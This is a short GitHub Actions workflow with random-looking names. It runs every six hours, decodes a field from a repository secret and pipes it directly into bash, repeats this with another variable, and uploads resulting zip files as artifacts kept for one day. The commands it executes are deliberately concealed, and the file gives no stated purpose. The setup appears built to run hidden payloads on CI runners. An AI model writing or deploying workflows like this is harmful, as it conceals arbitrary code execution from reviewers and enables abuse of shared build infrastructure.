name: dartrest39
on:
  workflow_dispatch:

  schedule:
    - cron: '22 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dartrest39
        env:
          kxha7: ${{ secrets.kxha7 }}
        run: |
          printf '%s' "$kxha7" | jq -r .jtma27840 | /bin/bash
          echo $qox34241 | jq -r .sq3 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: j4XVDkKq
          path: "*.zip"
          retention-days: 1
